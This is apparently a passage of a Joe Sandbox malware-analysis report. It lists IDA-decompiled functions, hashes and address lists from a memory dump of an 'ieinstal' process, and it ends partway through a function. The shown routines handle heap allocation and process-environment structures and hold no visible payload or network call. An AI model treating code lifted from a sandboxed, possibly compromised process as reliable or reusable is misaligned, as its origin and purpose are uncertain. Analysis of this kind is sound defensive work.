0x1f02e755
0x1efebea5
0x1efebeab
0x1efebeb0
0x1efebeb2
0x1efebeb2
0x1efebeb5
0x1efebebc
0x1efebec4
0x1efebf78
0x1efebf7d
0x1efebf81
0x00000000
0x00000000
0x1f02e74b
0x00000000
0x1f02e74b
0x1efebeca
0x1efebecd
0x00000000
0x1efebed1
0x1efebeec
0x1efebef0
0x00000000
0x00000000
0x1efebef6
0x1efebefc
0x1efebf03
0x1efebf0a
0x1efebf11
0x1efebf18
0x1efebf1f
0x1efebf26
0x1efebf2d
0x1efebf34
0x1efebf40
0x1efebf46
0x1efebf4b
0x1efebf56
0x1efebf58
0x1efebf5e
0x1efebf61
0x1efebf68
0x1efebf6e
0x00000000
0x1efebf6e
0x1efebf91
0x1efebf98
0x1efebf99
0x1efebf9a
0x1efebf9b
0x1efebf9c
0x1efebf9e
0x1efebfa7
0x1efebfc1
0x1efebfc5
0x1efebfc9
0x1efebfcb
0x1efebfd0
0x1efebfd4
0x1efebfdd
0x1efebfe2
0x1efebfe8
0x1efebfe8
0x1efebff1

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 514fd778de96686548d714d2267447d63f819bd79d9d6cd8b8cae929bb247cfd
Instruction ID: 0dc5c015e1314f8a3fdf46a97b9bdcc7ba0276fede863d89caf881cdd4a901c2
Opcode Fuzzy Hash: 514fd778de96686548d714d2267447d63f819bd79d9d6cd8b8cae929bb247cfd
Instruction Fuzzy Hash: 67217AB6600399CBEB21CF54C9E0B467BA4EB44714F0685A9DD055F68AC7B9E8448FE0

Uniqueness

Uniqueness Score: -1.00%

Function 1F03CD40 Relevance: .1, Instructions: 73
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E1F03CD40(void* __ecx, intOrPtr _a4, signed int _a8, signed int _a12, signed int _a16, intOrPtr* _a20) {
				intOrPtr _v12;
				intOrPtr _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _t28;
				void* _t33;
				signed int _t35;
				signed int _t42;
				void* _t43;
				short* _t46;

				_t42 = _a8;
				if((_t42 & 0xfffffffe) == 0) {
					_t35 = _a12;
					if((_t35 & 0xffff0000 | _a16) == 0) {
						_t46 = E1EFD5D90(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0x1c0);
						if(_t46 != 0) {
							E1F008F40(_t46, 0, 0x1c0);
							 *(_t46 + 0x20) = _t35;
							 *_t46 = 0x1c0;
							_t28 = _a16;
							 *(_t46 + 0x24) = _t28;
							 *((short*)(_t46 + 2)) = 1;
							_push(0x18);
							_v24 = _t28;
							_push( &_v28);
							_push(0x20);
							_push(_a4);
							_v16 = 1;
							_v20 = _t42;
							_v28 = _t35;
							_v12 = _t46;
							_t43 = E1F002A60();
							if(_t43 < 0) {
								E1EFD3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t46);
							} else {
								 *_a20 = _t46;
							}
							_t33 = _t43;
						} else {
							_t33 = 0xc0000017;
						}
					} else {
						_t33 = 0xc00000f1;
					}
				} else {
					_t33 = 0xc00000f0;
				}
				return _t33;
			}

0x1f03cd4e
0x1f03cd57
0x1f03cd63
0x1f03cd70
0x1f03cd92
0x1f03cd96
0x1f03cda7
0x1f03cdaf
0x1f03cdb9
0x1f03cdbd
0x1f03cdc0
0x1f03cdc3
0x1f03cdc7
0x1f03cdc9
0x1f03cdd1
0x1f03cdd2
0x1f03cdd4
0x1f03cdd7
0x1f03cddb
0x1f03cddf
0x1f03cde3
0x1f03cdec
0x1f03cdf0
0x1f03ce05
0x1f03cdf2
0x1f03cdf5
0x1f03cdf5
0x1f03ce0a
0x1f03cd98
0x1f03cd98
0x1f03cd98
0x1f03cd72
0x1f03cd72
0x1f03cd72
0x1f03cd59
0x1f03cd59
0x1f03cd59
0x1f03ce12

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7477e4733c3d8ac1b6be6b0fe7f659da3ee30cf32468bb8c8f799742df5ae00d
Instruction ID: 89c7e1771611dfaf2cc6348876a232de6ce00280d6d5022f2f3b00c90cbd1db8
Opcode Fuzzy Hash: 7477e4733c3d8ac1b6be6b0fe7f659da3ee30cf32468bb8c8f799742df5ae00d
Instruction Fuzzy Hash: 64217F76A44B149BD321DE2AD841B4B7BE5FB88760F00462AF945DB390D774E90087E9

Uniqueness

Uniqueness Score: -1.00%

Function 1EFC6B70 Relevance: .1, Instructions: 73
COMMON

Download Yara Rule

C-Code - Quality: 55%

			E1EFC6B70(intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				void* _v36;
				void* _v40;
				void* _v44;
				void* _v48;
				void* _v52;
				void* _v60;
				void* _v64;
				void* _v76;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t73;
				char* _t74;
				char* _t76;
				intOrPtr* _t78;
				char* _t79;
				intOrPtr* _t86;
				signed int _t93;
				intOrPtr* _t95;
				intOrPtr _t99;
				intOrPtr _t105;
				intOrPtr _t107;
				intOrPtr _t108;
				intOrPtr _t111;
				intOrPtr _t112;
				intOrPtr _t116;
				intOrPtr _t120;
				intOrPtr _t121;
				intOrPtr _t126;
				intOrPtr _t128;
				intOrPtr _t130;
				intOrPtr _t134;
				intOrPtr _t137;
				void* _t138;
				intOrPtr _t139;
				intOrPtr _t140;
				char _t141;
				intOrPtr _t144;
				intOrPtr* _t145;
				intOrPtr _t148;
				intOrPtr _t150;
				intOrPtr _t152;
				intOrPtr _t155;
				signed int _t158;
				void* _t160;

				_t160 = (_t158 & 0xfffffff8) - 0x14;
				_t105 = _a8;
				_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				_t3 = _t105 - 0x78; // -104
				_t152 = _t3;
				_v8 = _t152;
				if(_t73 != 0) {
					__eflags =  *_t73;
					if( *_t73 == 0) {
						goto L1;
					} else {
						_t74 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						goto L2;
					}
					L44:
				} else {
					L1:
					_t74 = 0x7ffe0386;
				}
				L2:
				if( *_t74 != 0) {
					E1F094B67( *((intOrPtr*)(_t152 + 0x5c)), _t105,  *((intOrPtr*)(_t152 + 0x30)),  *((intOrPtr*)(_t152 + 0x34)),  *((intOrPtr*)(_t152 + 0x3c)));
				}
				_t76 = E1EFC7072(_a4, _t152, 0);
				if(_t76 != 0) {
					_t78 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
					if(_t78 != 0) {
						__eflags =  *_t78;
						if( *_t78 == 0) {
							goto L5;
						} else {
							_t79 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
							goto L6;
						}
						goto L44;
					} else {
						L5:
						_t79 = 0x7ffe0386;
					}
					L6:
					if( *_t79 != 0) {
						E1F094C59( *((intOrPtr*)(_t152 + 0x5c)), _t105,  *((intOrPtr*)(_t152 + 0x30)),  *((intOrPtr*)(_t152 + 0x34)),  *((intOrPtr*)(_t152 + 0x3c)));
					}
					_t144 =  *((intOrPtr*)(_t152 + 0x3c));
					_t107 =  *((intOrPtr*)(_t152 + 0x34));
					_t134 =  *((intOrPtr*)(_t152 + 0x30));
					_t120 =  *((intOrPtr*)( *[fs:0x18] + 0xf90));
					if(_t120 == 0) {
						_t108 = 0;
						 *((intOrPtr*)(_t160 + 0xc)) = 0;
					} else {
						 *((intOrPtr*)(_t120 + 0xc)) =  *((intOrPtr*)(_t120 + 0xc)) + 1;
						_t93 =  *(_t120 + 8) - 0x00000001 & 0x00000001;
						 *(_t120 + 8) = _t93;
						_t128 = _t120 + (_t93 + _t93 * 2) * 8;
						_t95 = _t128 + 0x18;
						 *((intOrPtr*)(_t128 + 0x1c)) = _t107;
						 *((intOrPtr*)(_t160 + 0x18)) = _t128;
						 *((intOrPtr*)(_t160 + 0xc)) = _t95;
						 *_t95 = _t134;
						 *((intOrPtr*)(_t128 + 0x20)) = _t144;
						while(1) {
							 *((intOrPtr*)(_t160 + 0x14)) =  *0x7FFE03B4;
							 *((intOrPtr*)(_t160 + 0x10)) =  *0x7ffe03b0;
							while(1) {
								_t130 =  *0x7ffe000c;
								_t140 =  *0x7ffe0008;
								if(_t130 ==  *0x7ffe0010) {
									break;
								}
								asm("pause");
							}
							_t150 =  *((intOrPtr*)(0x7ffe03b4));
							_t116 =  *((intOrPtr*)(_t160 + 0x14));
							__eflags =  *((intOrPtr*)(_t160 + 0x10)) -  *0x7ffe03b0;
							if( *((intOrPtr*)(_t160 + 0x10)) !=  *0x7ffe03b0) {
								L32:
								asm("pause");
								continue;
							}
							__eflags = _t116 - _t150;
							if(_t116 != _t150) {
								goto L32;
							}
							_t141 = _t140 -  *((intOrPtr*)(_t160 + 0x10));
							__eflags = _t141;
							_t99 =  *((intOrPtr*)(_t160 + 0x18));
							_t152 = _v8;
							asm("sbb ecx, ebx");
							_t108 =  *((intOrPtr*)(_t160 + 0xc));
							 *((intOrPtr*)(_t99 + 0x28)) = _t141;
							 *((intOrPtr*)(_t99 + 0x2c)) = _t130;
							_t134 =  *((intOrPtr*)(_t152 + 0x30));
							goto L15;
						}
					}
					L15:
					_t121 = _a4;
					_push(_t152);
					 *((intOrPtr*)(_t121 + 0x30)) = _t134;
					 *((intOrPtr*)(_t121 + 0x34)) =  *((intOrPtr*)(_t152 + 0x34));
					_t145 =  *((intOrPtr*)(_t152 + 0x30));
					_push( *((intOrPtr*)(_t152 + 0x34)));
					_push(_t121);
					__eflags = _t145 - E1EFC71F0;
					if(_t145 == E1EFC71F0) {
						E1EFC71F0(_t108, _t121, _t145, _t152);
					} else {
						 *0x1f0b91e0();
						 *_t145();
					}
					_t86 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
					__eflags = _t86;
					if(_t86 != 0) {
						__eflags =  *_t86;
						if( *_t86 == 0) {
							goto L18;
						} else {
							_t76 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
							goto L19;
						}
						goto L44;
					} else {
						L18:
						_t76 = 0x7ffe0386;
					}
					L19:
					__eflags =  *_t76;
					if( *_t76 != 0) {
						_t76 = E1F094CD2( *((intOrPtr*)(_t152 + 0x5c)), _a8,  *((intOrPtr*)(_t152 + 0x30)),  *((intOrPtr*)(_t152 + 0x34)),  *((intOrPtr*)(_t152 + 0x3c)));
					}
					__eflags = _t108;
					if(_t108 != 0) {
						while(1) {
							_v8 =  *0x7ffe03b0;
							 *((intOrPtr*)(_t160 + 0x18)) =  *((intOrPtr*)(0x7ffe03b4));
							while(1) {
								_t76 =  *0x7ffe000c;
								_t137 =  *0x7ffe0008;
								__eflags = _t76 -  *0x7ffe0010;
								if(_t76 ==  *0x7ffe0010) {
									break;
								}
								asm("pause");
							}
							_t111 = _v8;
							_t155 =  *((intOrPtr*)(0x7ffe03b4));
							_t148 =  *((intOrPtr*)(_t160 + 0x18));
							__eflags = _t111 -  *0x7ffe03b0;
							if(_t111 !=  *0x7ffe03b0) {
								L33:
								asm("pause");
								continue;
							}
							__eflags = _t148 - _t155;
							if(_t148 != _t155) {
								goto L33;
							}
							_t138 = _t137 - _t111;
							_t112 =  *((intOrPtr*)(_t160 + 0xc));
							asm("sbb eax, edi");
							_t126 =  *((intOrPtr*)(_t112 + 0x10));
							__eflags = _t76 -  *((intOrPtr*)(_t112 + 0x14));
							if(__eflags > 0) {
								L29:
								_t139 = _t138 - _t126;
								__eflags = _t139;
								 *((intOrPtr*)(_t112 + 0x10)) = _t139;
								asm("sbb eax, esi");
								 *((intOrPtr*)(_t112 + 0x14)) = _t76;
							} else {
								if(__eflags >= 0) {
									__eflags = _t138 - _t126;
									if(_t138 >= _t126) {
										goto L29;
									}
								}
							}
							goto L30;
						}
					}
				}
				L30:
				return _t76;
				goto L44;
			}

0x1efc6b78
0x1efc6b82
0x1efc6b86
0x1efc6b8a
0x1efc6b8a
0x1efc6b8d
0x1efc6b93
0x1f021281
0x1f021284
0x00000000
0x1f02128a
0x1f021293
0x00000000
0x1f021293
0x00000000
0x1efc6b99
0x1efc6b99
0x1efc6b99
0x1efc6b99
0x1efc6b9e
0x1efc6ba1
0x1f0212ab
0x1f0212ab
0x1efc6bae
0x1efc6bb5
0x1efc6bc1
0x1efc6bc6
0x1f0212b5
0x1f0212b8
0x00000000
0x1f0212be
0x1f0212c7
0x00000000
0x1f0212c7
0x00000000
0x1efc6bcc
0x1efc6bcc
0x1efc6bcc
0x1efc6bcc
0x1efc6bd1
0x1efc6bd4
0x1f0212df
0x1f0212df
0x1efc6be0
0x1efc6be3
0x1efc6be6
0x1efc6be9
0x1efc6bf1
0x1f0212e9
0x1f0212eb
0x1efc6bf7
0x1efc6bff
0x1efc6c03
0x1efc6c06
0x1efc6c0c
0x1efc6c0f
0x1efc6c12
0x1efc6c15
0x1efc6c19
0x1efc6c1d
0x1efc6c1f
0x1efc6c22
0x1efc6c31
0x1efc6c3a
0x1efc6c40
0x1efc6c40
0x1efc6c42
0x1efc6c48
0x00000000
0x00000000
0x1efc6c4a
0x1efc6c4a
0x1efc6c55
0x1efc6c58
0x1efc6c5c
0x1efc6c60
0x1efc6d52
0x1efc6d52
0x00000000
0x1efc6d52
0x1efc6c66
0x1efc6c68
0x00000000
0x00000000
0x1efc6c6e
0x1efc6c6e
0x1efc6c72
0x1efc6c76
0x1efc6c7a
0x1efc6c7c
0x1efc6c80
0x1efc6c83
0x1efc6c86
0x00000000
0x1efc6c86
0x1efc6c22
0x1efc6c89
0x1efc6c89
0x1efc6c8c
0x1efc6c8d
0x1efc6c93
0x1efc6c99
0x1efc6c9c
0x1efc6c9d
0x1efc6c9e
0x1efc6ca4
0x1efc6d48
0x1efc6caa
0x1efc6cac
0x1efc6cb2
0x1efc6cb2
0x1efc6cba
0x1efc6cbd
0x1efc6cbf
0x1f0212f4
0x1f0212f7
0x00000000
0x1f0212fd
0x1f021306
0x00000000
0x1f021306
0x00000000
0x1efc6cc5
0x1efc6cc5
0x1efc6cc5
0x1efc6cc5
0x1efc6cca
0x1efc6cca
0x1efc6ccd
0x1f02131f
0x1f02131f
0x1efc6cd3
0x1efc6cd5
0x1efc6cd7
0x1efc6ce3
0x1efc6cec
0x1efc6cf5
0x1efc6cf5
0x1efc6cfc
0x1efc6d00
0x1efc6d02
0x00000000
0x00000000
0x1efc6d04
0x1efc6d04
0x1efc6d0a
0x1efc6d0e
0x1efc6d11
0x1efc6d15
0x1efc6d17
0x1efc6d59
0x1efc6d59
0x00000000
0x1efc6d59
0x1efc6d19
0x1efc6d1b
0x00000000
0x00000000
0x1efc6d1d
0x1efc6d1f
0x1efc6d23
0x1efc6d28
0x1efc6d2b
0x1efc6d2d
0x1efc6d35
0x1efc6d35
0x1efc6d35
0x1efc6d37
0x1efc6d3a
0x1efc6d3c
0x1efc6d2f
0x1efc6d2f
0x1efc6d31
0x1efc6d33
0x00000000
0x00000000
0x1efc6d33
0x1efc6d2f
0x00000000
0x1efc6d2d
0x1efc6cd7
0x1efc6cd5
0x1efc6d3f
0x1efc6d45
0x00000000

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 920d5b909806b3facf05956b1c18f98678fb4139a254831fff11f117e8eeedb9
Instruction ID: 82426c79f254e1df60458ce7a32db585e5abba802efef6bbb410adc50141d84c
Opcode Fuzzy Hash: 920d5b909806b3facf05956b1c18f98678fb4139a254831fff11f117e8eeedb9
Instruction Fuzzy Hash: 95318775604642CFC710CF59C090B16B7E9FB88714F2285AEE9498B751DB31F902CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 1EFBFAEC Relevance: .1, Instructions: 72
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1EFBFAEC(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				signed int _t38;
				intOrPtr _t39;
				void* _t40;
				signed int _t41;
				intOrPtr* _t45;
				intOrPtr* _t46;
				signed short _t49;
				intOrPtr _t50;
				signed int _t51;
				signed int _t53;
				intOrPtr _t55;
				intOrPtr* _t56;
				intOrPtr _t57;
				signed int _t58;

				_t57 = __ecx;
				_t55 =  *[fs:0x30];
				_v20 = __ecx;
				_v16 = _t55;
				if( *((intOrPtr*)(__ecx + 8)) == 0xddeeddee) {
					_t49 =  *(__ecx + 0x14) & 0x0000ffff;
				} else {
					_t49 =  *(__ecx + 0x7c) & 0x0000ffff;
				}
				_t38 =  *(_t55 + 0x88);
				if(_t38 == 0 || _t49 == 0) {
					L8:
					return _t38;
				} else {
					_t53 = _t49 & 0x0000ffff;
					if(_t53 > _t38) {
						goto L8;
					}
					_t50 =  *((intOrPtr*)(_t55 + 0x90));
					_v8 = _t38;
					_t45 = _t50 + _t53 * 4;
					_v12 = _t45;
					_t46 = _t45 + 0xfffffffc;
					_t11 =  &_v8;
					 *_t11 = _v8 - _t53;
					if( *_t11 != 0) {
						_t58 = _v8;
						_t56 = _v12;
						do {
							_t39 =  *_t56;
							_t56 = _t56 + 4;
							 *_t46 = _t39;
							if( *((intOrPtr*)(_t39 + 8)) == 0xddeeddee) {
								_t51 =  *(_t39 + 0x14) & 0x0000ffff;
							} else {
								_t51 =  *(_t39 + 0x7c) & 0x0000ffff;
							}
							_t40 = E1EFBA945(_t39, _t51, _t51 - 1);
							if( *((intOrPtr*)(_t40 + 8)) == 0xddeeddee) {
								 *((intOrPtr*)(_t40 + 0x14)) =  *((intOrPtr*)(_t40 + 0x14)) + 0xffff;
							} else {
								 *((intOrPtr*)(_t40 + 0x7c)) =  *((intOrPtr*)(_t40 + 0x7c)) + 0xffff;
							}
							_t46 = _t46 + 4;
							_t58 = _t58 - 1;
						} while (_t58 != 0);
						_t55 = _v16;
						_t57 = _v20;
						_t38 =  *(_t55 + 0x88);
						_t50 =  *((intOrPtr*)(_t55 + 0x90));
					}
					_t41 = _t38 - 1;
					 *(_t55 + 0x88) = _t41;
					 *(_t50 + _t41 * 4) =  *(_t50 + _t41 * 4) & 0x00000000;
					if( *((intOrPtr*)(_t57 + 8)) == 0xddeeddee) {
						 *((short*)(_t57 + 0x14)) = 0;
						return 0;
					}
					 *((short*)(_t57 + 0x7c)) = 0;
					return 0;
				}
			}

0x1efbfaf5
0x1efbfaf8
0x1efbfaff
0x1efbfb09
0x1efbfb0c
0x1f01e6fa
0x1efbfb12
0x1efbfb12
0x1efbfb12
0x1efbfb16
0x1efbfb1e
0x1efbfb62
0x1efbfb62
0x1efbfb25
0x1efbfb25
0x1efbfb2a
0x00000000
0x00000000
0x1efbfb2c
0x1efbfb33
0x1efbfb36
0x1efbfb39
0x1efbfb3c
0x1efbfb3f
0x1efbfb3f
0x1efbfb42
0x1efbfb63
0x1efbfb66
0x1efbfb69
0x1efbfb69
0x1efbfb6b
0x1efbfb6e
0x1efbfb77
0x1efbfbb3
0x1efbfb79
0x1efbfb79
0x1efbfb79
0x1efbfb80
0x1efbfb91
0x1efbfbb9
0x1efbfb93
0x1efbfb93
0x1efbfb93
0x1efbfb97
0x1efbfb9a
0x1efbfb9a
0x1efbfb9f
0x1efbfba2
0x1efbfba5
0x1efbfbab
0x1efbfbab
0x1efbfb44
0x1efbfb45
0x1efbfb4c
0x1efbfb57
0x1efbfbc1
0x00000000
0x1efbfbc1
0x1efbfb5b
0x00000000
0x1efbfb5b

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 83bdbddc7f081f116cfd5a5e5560267fcc03b69956c6229cc2f9c88a219cf52a
Instruction ID: 6d1b16e84b292c450ec44aa6e35da1437779937297d069c0b9b3c39ec9ab1f15
Opcode Fuzzy Hash: 83bdbddc7f081f116cfd5a5e5560267fcc03b69956c6229cc2f9c88a219cf52a
Instruction Fuzzy Hash: D321CE33900622DBC714DF66C8B0669F3F6FF44310F11C6A9CC6997651E776AA80CB60

Uniqueness

Uniqueness Score: -1.00%

Function 1F057C38 Relevance: .1, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1F057C38(signed char* __ecx, signed int __edx, signed char* _a4, signed int _a8, intOrPtr _a12, signed int _a16, char _a20, intOrPtr _a24, signed int* _a28, signed int _a32) {
				char _v8;
				signed int _v12;
				signed char* _v16;
				signed int _v20;
				char _t23;
				signed int _t24;
				void* _t25;
				signed int _t31;
				intOrPtr _t33;
				signed int _t39;
				void* _t41;
				signed int* _t43;

				_t35 = __ecx;
				_v12 = _v12 & 0x00000000;
				_t33 =  *((intOrPtr*)( *[fs:0x30] + 0x18));
				_t23 = 0x400;
				_t43 = _a28;
				_t39 = __edx;
				_v16 = __ecx;
				_v20 = __edx;
				_v8 = 0x400;
				while(1) {
					_t24 = E1EFD5D90(_t35, _t33, 0, _t23);
					 *_t43 = _t24;
					if(_t24 == 0) {
						break;
					}
					_t35 = _v16;
					_t41 = E1F057A51(_v16, _t39, _a4, _a8, _a12, _a16, _a20, _a24,  &_v8, _t24, _a32);
					if(_t41 >= 0) {
						if(_v8 == 0) {
							E1EFD3BC0(_t33, 0,  *_t43);
							 *_t43 =  *_t43 & 0x00000000;
						}
						L8:
						_t25 = _t41;
						L10:
						return _t25;
					}
					E1EFD3BC0(_t33, 0,  *_t43);
					 *_t43 =  *_t43 & 0x00000000;
					if(_t41 != 0xc0000023) {
						goto L8;
					}
					_t31 = _v12 + 1;
					_v12 = _t31;
					if(_t31 >= 2) {
						goto L8;
					}
					_t23 = _v8;
					_t39 = _v20;
				}
				_t25 = 0xc0000017;
				goto L10;
			}

0x1f057c38
0x1f057c46
0x1f057c4c
0x1f057c4f
0x1f057c54
0x1f057c58
0x1f057c5a
0x1f057c5d
0x1f057c60
0x1f057c63
0x1f057c67
0x1f057c6c
0x1f057c70
0x00000000
0x00000000
0x1f057c75
0x1f057c96
0x1f057c9a
0x1f057cc9
0x1f057cd0
0x1f057cd5
0x1f057cd5
0x1f057cd8
0x1f057cd8
0x1f057ce1
0x1f057ce5
0x1f057ce5
0x1f057ca1
0x1f057ca6
0x1f057caf
0x00000000
0x00000000
0x1f057cb4
0x1f057cb5
0x1f057cbb
0x00000000
0x00000000
0x1f057cbd
0x1f057cc0
0x1f057cc0
0x1f057cdc
0x00000000

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ee17a0d1079a4772c603ff45f84419bb43025fe42eb990e5d19e7a9d1d14c39e
Instruction ID: 0315c64d1bfc638b740ed3f57e1d82a22e88bc1e305177814346876773c4b143
Opcode Fuzzy Hash: ee17a0d1079a4772c603ff45f84419bb43025fe42eb990e5d19e7a9d1d14c39e
Instruction Fuzzy Hash: 7F214DB6900249EFDB21CF94CC40B9EBBF9FF88310F204859F955A7260D774E951AB50

Uniqueness

Uniqueness Score: -1.00%

Function 1F04FB45 Relevance: .1, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E1F04FB45(void* __ecx, void* __edx) {
				signed char _t23;
				void* _t34;
				signed int _t35;
				void* _t39;

				_t37 = __ecx;
				_t39 = __ecx;
				_t34 = __edx;
				if(__ecx != 0) {
					_t23 =  *0x1f0b4f50; // 0x0
					_t40 = 0xc0000001;
					if(_t23 != 0) {
						if((_t23 & 0x00000001) != 0 &&  *(__ecx + 0x14) != 0) {
							_t4 = _t39 + 0x14; // 0xfc
							_push( *_t4);
							E1F002A80();
							 *(__ecx + 0x14) =  *(__ecx + 0x14) & 0x00000000;
							_t40 = 0;
							_t23 =  *0x1f0b4f50; // 0x0
						}
						if((_t23 & 0x00000006) != 0) {
							if( *(_t39 + 0x10) == 0 ||  *(_t39 + 0x10) == 0xffffffff || (_t23 & 0x00000004) != 0 || (_t23 & 0x00000002) == 0 || _t34 == 0) {
								L16:
								_t40 = 0;
							} else {
								_t40 = 0xc0000019;
								if( *((intOrPtr*)(_t39 + 0x1c)) != 0xc0000019) {
									_t16 = _t39 + 0x18; // 0x1000
									_t35 = E1EFD5D90(_t37,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *_t16);
									if(_t35 != 0) {
										_t18 = _t39 + 0x18; // 0x1000
										_t19 = _t39 + 0x10; // 0x34c0001
										E1F0088C0(_t35,  *_t19 & 0xfffffffc,  *_t18);
										_t20 = _t39 + 0x10; // 0x34c0001
										_push( *_t20 & 0xfffffffc);
										_push(0xffffffff);
										E1F002C50();
										 *((intOrPtr*)(_t39 + 0x1c)) = 0xc0000019;
										 *(_t39 + 0x10) = _t35 | 0x00000001;
										goto L16;
									} else {
										_t40 = 0xffffffffc0000017;
									}
								}
							}
						}
					}
				} else {
					_t40 = 0xc000000d;
				}
				return _t40;
			}

0x1f04fb45
0x1f04fb4a
0x1f04fb4c
0x1f04fb50
0x1f04fb5c
0x1f04fb61
0x1f04fb68
0x1f04fb70
0x1f04fb78
0x1f04fb78
0x1f04fb7b
0x1f04fb80
0x1f04fb84
0x1f04fb86
0x1f04fb86
0x1f04fb8d
0x1f04fb93
0x1f04fbf9
0x1f04fbf9
0x1f04fba7
0x1f04fba7
0x1f04fbaf
0x1f04fbb1
0x1f04fbc4
0x1f04fbc8
0x1f04fbcf
0x1f04fbd2
0x1f04fbda
0x1f04fbdf
0x1f04fbe8
0x1f04fbe9
0x1f04fbeb
0x1f04fbf3
0x1f04fbf6
0x00000000
0x1f04fbca
0x1f04fbca
0x1f04fbca
0x1f04fbc8
0x1f04fbaf
0x1f04fb93
0x1f04fb8d
0x1f04fb52
0x1f04fb52
0x1f04fb52
0x1f04fc00

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4c8e11826bf0dfe8e2060b6c2c51670fad4727eb051e2cb88d8c6ea6fc597596
Instruction ID: e308b0f1899389a6d404ce0e954e7d588556272a119373c09cf3110b0d0517ca
Opcode Fuzzy Hash: 4c8e11826bf0dfe8e2060b6c2c51670fad4727eb051e2cb88d8c6ea6fc597596
Instruction Fuzzy Hash: CE11C671A00B13EBD701CE248C68751B3A4BB0637AF310739D860D7990D761F892C6E0

Uniqueness

Uniqueness Score: -1.00%

Function 1EFB7B7D Relevance: .1, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E1EFB7B7D(signed short* __ecx) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _t17;
				signed int _t18;
				char _t27;
				signed short _t32;
				signed short* _t34;
				void* _t35;

				_t34 = __ecx;
				_t27 = 0;
				_t29 = 0;
				_t35 = E1EFB7C85(0);
				if(_t35 == 0) {
					_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					_v12 =  *((intOrPtr*)(_t29 + 0x24));
					_t17 =  *((intOrPtr*)(_t29 + 0x28));
				} else {
					_v12 =  *((intOrPtr*)(_t35 + 0xc));
					_t17 =  *((intOrPtr*)(_t35 + 0x10));
				}
				_t32 = _v12;
				_v8 = _t17;
				_t18 =  *_t34 & 0x0000ffff;
				if(_t32 <= 6) {
					if(_t32 != _t18) {
						goto L4;
					}
					goto L10;
				} else {
					_t29 = (_t32 & 0x0000ffff) - 2;
					if((_t32 & 0x0000ffff) - 2 == _t18) {
						_v12 = _t32 + 0xfffe;
						L10:
						_t18 = E1EFE1280( &_v12, _t34, 1);
						if(_t18 != 0) {
							_t27 = 1;
						}
					}
					L4:
					if(_t35 == 0) {
						_push(0x1f0b5b40);
						E1EFCE740(_t29);
